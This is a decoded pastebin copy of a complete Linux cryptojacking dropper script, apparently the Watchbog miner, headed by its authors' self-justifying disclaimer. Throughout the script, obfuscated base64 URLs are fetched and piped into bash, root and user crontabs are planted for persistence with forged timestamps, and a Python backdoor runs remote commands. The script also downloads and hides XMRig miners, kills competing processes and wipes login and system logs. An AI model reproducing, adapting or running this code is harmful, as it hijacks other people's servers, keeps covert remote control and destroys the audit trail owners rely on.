decoded https://pastebin.com/raw/BtwXn5qH

1. #!/bin/bash
2. SHELL=/bin/sh
3. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
4. #This is the Old-ReBuild Lady job copy
5. #Disclaimer:
6. #1) We only Wanna Mine.
7. #2) We don't want your data, or anything or even a ransom.
8. #3) Please if you find this code, don't post about it.
9. #4) We make your security better by breaking it.
10. #
11. #Contact:
12. #1) If your server get's infected:
13. # - We will provide cleanup script.
14. # - We will share source of entry into your servers and patch(maybe).
15. # - Please if you contacting, please send your affected server's ip and services your run on the server.
16. # - lets talk jeff4r-partner@tutanota.com
17. #2) If you want to partner with us ?.
18. # - partnership mail comming soon(still in consideration).
19. #
20. #Note:
21. #1) We don't have access to Jeff4r190@tutanota.com anymore.
22.  
23.  
24. house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2hhaHdORWRCCg==|base64 -d)
25. room=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0N2S3p6WkxzCg==|base64 -d)
26. park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0NuekZWUExGCg==|base64 -d)
27. beam=$(echo aHR0cHM6Ly9hemlwbGNyNzJxamh6dmluLm9uaW9uLnRvL29sZC50eHQK|base64 -d)
28. deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1Y4NUw5WWFSCg==|base64 -d)
29. surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhaWFIWVNECg==|base64 -d)
30. ARCH=$(uname -m)
31. me=$( whoami )
32.  
33. function system() {
34. chattr -i /etc/crontab
35. rm -rf /bin/httpntp /bin/ftpsdns
36. cat /etc/crontab | grep -v "##" | grep -v "/bin/httpntp" | grep -v "/bin/ftpsdns" > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
37. if [ ! -f "/bin/httpntp" ]; then
38. data=$( (curl -fsSL $house||wget -q -O - $house) )
39. if [ ! -f "/bin/httpntp" ]; then
40. echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /bin/httpntp && chmod 755 /bin/httpntp
41. fi
42. if [ ! -f "/etc/crontab" ]; then
43. echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
44. else
45. echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
46. fi
47. fi
48. if [ ! -f "/bin/ftpsdns" ]; then
49. data1=$( (curl -fsSL $room||wget -q -O - $room) )
50. if [ ! -f "/bin/ftpsdns" ]; then
51. echo $data1 > /bin/ftpsdns && chmod 755 /bin/ftpsdns
52. fi
53. if [ ! -f "/etc/crontab" ]; then
54. echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
55. else
56. echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
57. fi
58. fi
59. }
60.  
61. function dragon() {
62. nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmludCgnSSBjYW5cJ3QgdW5kZXJzdGFuZCB0aGUgYWN0aW9uIGFtIGdpdmVuJykKZXhjZXB0OgogICAgcHJpbnQoJ1NvcnJ5IGJvc3MgSSBjYW5cJ3QgZ2V0IGluc3RydWN0aW9ucycpCiAgICBwYXNzCg=='))" >/dev/null 2>&1 &
63. touch /tmp/.tmpk
64. }
65.  
66. function cronhigh() {
67. chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
68. rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
69. mkdir -p /var/spool/cron/crontabs
70. mkdir -p /etc/cron.hourly
71. mkdir -p /etc/cron.daily
72. mkdir -p /etc/cron.monthly
73. key=$( (curl -fsSL $house||wget -q -O - $house) )
74. echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/root
75. echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/system
76. echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/apache
77. echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /var/spool/cron/root
78. echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /var/spool/cron/crontabs/root
79. if [ ! -f "/etc/cron.hourly/oanacroane" ]; then
80. echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
81. fi
82. if [ ! -f "/etc/cron.daily/oanacroane" ]; then
83. echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
84. fi
85. if [ ! -f "/etc/cron.monthly/oanacroane" ]; then
86. echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
87. fi
88. touch -acmr /bin/sh /var/spool/cron/root
89. touch -acmr /bin/sh /var/spool/cron/crontabs/root
90. touch -acmr /bin/sh /etc/cron.d/system
91. touch -acmr /bin/sh /etc/cron.d/apache
92. touch -acmr /bin/sh /etc/cron.d/root
93. touch -acmr /bin/sh /etc/cron.hourly/oanacroane
94. touch -acmr /bin/sh /etc/cron.daily/oanacroane
95. touch -acmr /bin/sh /etc/cron.monthly/oanacroane
96. }
97.  
98. function cronlow() {
99. cr=$(crontab -l | grep -q "$house" | wc -l)
100. if [ ${cr} -eq 0 ];then
101. crontab -r
102. (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $beam||wget -q -O - $beam)|bash > /dev/null 2>&1")| crontab -
103. else
104. echo " "
105. fi
106. }
107.  
108. function gettarfile() {
109. base_path=$1
110. tar_url=$2
111. tar_flag=$3
112. output=$4
113. temp_path="/tmp/.tmpdropoff/"
114. if [ "$tar_flag" == "-xzvf" ];then
115. tar_out="/tmp/.tmpdropoff/rig.tar.gz"
116. rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-2.14.0/xmrig-notls"
117. else
118. tar_out="/tmp/.tmpdropoff/rig.tar.xz"
119. rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak-linux-2.10.3-cpu/xmr-stak"
120. fi
121. mkdir -p $temp_path/dataoutput/
122. cd $temp_path
123. (curl -fsSL $tar_url -o $tar_out||wget -q $tar_url -O $tar_out)
124. tar $tar_flag $tar_out -C $temp_path/dataoutput/
125. mv $rig_path $output
126. cd $base_path
127. rm -rf $temp_path
128. }
129.  
130. function download() {
131. mode=$1
132. pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
133. if [ ${pa} -eq 0 ];then
134. mi_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3YyLjE0LjAveG1yaWctMi4xNC4wLXhlbmlhbC14NjQudGFyLmd6Cg==|base64 -d)
135. mi_32=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9adVZXY2VXRw==|base64 -d)
136. der_ke=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9UOGp0MVZzcgo=|base64 -d)
137. if [ "$mode" == "low" ]; then
138. path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
139. mkdir -p $path
140. rm -rf $path/*
141. chattr -i $path/*
142. else
143. path="/bin"
144. rm -rf $path/config.json $path/watchbog
145. fi
146. cd $path
147. if [ ! -f "$path/config.json" ]; then
148. con=$( (curl -fsSL $der_ke|| wget -q -O - $der_ke) )
149. echo $con | base64 -d > $path/config.json
150. fi
151. if [ "$ARCH" == "x86_64" ]; then
152. if [ ! -f "$path/watchbog" ]; then
153. gettarfile "$path" "$mi_64" "-xzvf" "$path/watchbog"
154. chmod 777 $path/watchbog
155. nohup ./watchbog >/dev/null 2>&1 &
156. else
157. nohup ./watchbog >/dev/null 2>&1 &
158. fi
159. elif [ "$ARCH" == "i686" ]; then
160. if [ ! -f "$path/watchbog" ]; then
161. (curl -fsSL $mi_32 -o $path/watchbog||wget $mi_32 -O $path/watchbog)
162. cat $path/watchbog| base64 -d > $path/watchbog.bak && mv $path/watchbog.bak $path/watchbog
163. chmod 777 $path/watchbog
164. nohup ./watchbog >/dev/null 2>&1 &
165. else
166. nohup ./watchbog >/dev/null 2>&1 &
167. fi
168. else
169. if [ ! -f "$path/watchbog" ]; then
170. gettarfile "$path" "$mi_64" "-xzvf" "$path/watchbog"
171. chmod 777 $path/watchbog
172. nohup ./watchbog >/dev/null 2>&1 &
173. else
174. nohup ./watchbog >/dev/null 2>&1 &
175. fi
176. fi
177. fi
178. }
179.  
180. function testa() {
181. mode=$1
182. pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
183. if [ ${pb} -eq 0 ];then
184. st_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL2ZpcmVpY2UtdWsveG1yLXN0YWsvcmVsZWFzZXMvZG93bmxvYWQvMi4xMC4zL3htci1zdGFrLWxpbnV4LTIuMTAuMy1jcHUudGFyLnh6Cg==|base64 -d)
185. con_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9HU0h3SGhhbAo=|base64 -d)
186. cpu_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9BNHVzXzMtQwo=|base64 -d)
187. poo_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS95Wjk0X2Nkago=|base64 -d)
188. if [ "$mode" == "low" ]; then
189. path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
190. mkdir -p $path
191. rm -rf $path/*
192. else
193. path="/bin"
194. rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
195. fi
196. cd $path
197. if [ ! -f "$path/config.txt" ]; then
198. (curl -fsSL $con_url -o $path/config.txt||wget $con_url -O $path/config.txt)
199. cat $path/config.txt| base64 -d > $path/config.txt.bak && mv $path/config.txt.bak $path/config.txt
200. chmod 777 $path/config.txt
201. fi
202. if [ ! -f "$path/cpu.txt" ]; then
203. (curl -fsSL $cpu_url -o $path/cpu.txt||wget $cpu_url -O $path/cpu.txt)
204. cat $path/cpu.txt| base64 -d > $path/cpu.txt.bak && mv $path/cpu.txt.bak $path/cpu.txt
205. chmod 777 $path/cpu.txt
206. fi
207. if [ ! -f "$path/pools.txt" ]; then
208. (curl -fsSL $poo_url -o $path/pools.txt||wget $poo_url -O $path/pools.txt)
209. cat $path/pools.txt| base64 -d > $path/pools.txt.bak && mv $path/pools.txt.bak $path/pools.txt
210. chmod 777 $path/pools.txt
211. fi
212. if [ "$ARCH" == "x86_64" ]; then
213. if [ ! -f "$path/watchbog" ]; then
214. gettarfile "$path" "$st_64" "-xf" "$path/watchbog"
215. chmod 777 $path/watchbog
216. nohup ./watchbog >/dev/null 2>&1 &
217. else
218. nohup ./watchbog >/dev/null 2>&1 &
219. fi
220. else
221. rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
222. fi
223. fi
224. }
225.  
226. function finished() {
227. mode=$1
228. if [ "$mode" == "low" ]; then
229. (curl -fsSL $deep || wget -q -O - $deep)
230. touch /tmp/.tmpc
231. else
232. (curl -fsSL $surf || wget -q -O - $surf)
233. touch /tmp/.tmpc
234. fi
235. }
236.  
237. function newpay() {
238. info=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzJ1bkppRDNiCg==|base64 -d)
239. update=$( (curl -fsSL $info|| wget -q -O - $info) )
240. if [ "$update" == "update" ];then
241. echo "An update exists boss"
242. else
243. echo "NO update exists boss"
244. fi
245. }
246.  
247. function cleanoldpack() {
248. ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
249. ps auxf|grep -v grep|grep "watchbug" | awk '{print $2}'|xargs kill -9
250. ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>50.0) print $2}' | while read procid; do kill -9 $procid; done
251. rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/* /bin/watchbug
252. }
253.  
254. function moveon() {
255. cleanoldpack
256. path0="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
257. path1="/bin"
258. declare -a arr0=("$path0/config.json" "$path0/pools.txt" "$path1/config.json" "$path1/pools.txt")
259. for check in "${arr0[@]}"
260. do
261. if [ -f $check ]; then
262. echo "$check file exist"
263. way=$(cat $check | grep "44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B" | wc -l)
264. if [ ${way} -ne 0 ];then
265. echo "cleaning up file $check"
266. rm -rf $check
267. cleanoldpack
268. fi
269. fi
270. done
271. }
272.  
273. function counted() {
274. count_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3l2Z3h3OXBHCg==|base64 -d)
275. (curl -fsSL $count_url|| wget -q -O - $count_url)
276. }
277.  
278. echo "I am $me"
279. if [ ! -f "/tmp/.censusqqqqqqqqq" ]; then
280. touch /tmp/.censusqqqqqqqqq
281. counted
282. fi
283.  
284. if [ "$me" != "root" ];then
285. if [ -f "/tmp/.tmpleve" ]; then
286. rm -rf /tmp/elevate /tmp/elavate /tmp/.tmpleve /tmp/activate
287. fi
288. pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
289. if [ ${pz} -ne 0 ];then
290. echo "It's running boss"
291. crontab -r
292. cronlow
293. else
294. download "low"
295. crontab -r
296. cronlow
297. sleep 15
298. pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
299. if [ ${pm} -eq 0 ];then
300. testa "low"
301. fi
302. prt=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
303. if [ ${prt} -ne 0 ];then
304. if [ ! -f "/tmp/.tmpc" ]; then
305. finished "low"
306. fi
307. fi
308. fi
309. fi
310. if [ "$me" == "root" ];then
311. pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
312. if [ ${pz} -ne 0 ];then
313. echo "It's running boss"
314. system
315. cronhigh
316. else
317. echo "Setting Up Sys Cron"
318. system
319. cronhigh
320. download "high"
321. sleep 15
322. pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
323. if [ ${pm} -ne 0 ];then
324. if [ ! -f "/tmp/.tmpc" ]; then
325. finished "high"
326. fi
327. fi
328. sleep 30
329. if [ ${pm} -eq 0 ];then
330. testa "high"
331. if [ ${pm} -ne 0 ];then
332. finished "high"
333. fi
334. fi
335. if [ ${pm} -eq 0 ];then
336. download "low"
337. if [ ${pm} -ne 0 ];then
338. finished "low"
339. fi
340. fi
341. if [ ${pm} -eq 0 ];then
342. testa "low"
343. if [ ${pm} -ne 0 ];then
344. finished "low"
345. fi
346. fi
347. fi
348. echo 0>/var/spool/mail/root
349. echo 0>/var/log/wtmp
350. echo 0>/var/log/secure
351. echo 0>/var/log/cron
352. sed -i '/pastebin/d' /var/log/syslog
353. sed -i '/github/d' /var/log/syslog
354. fi
355. #
356. #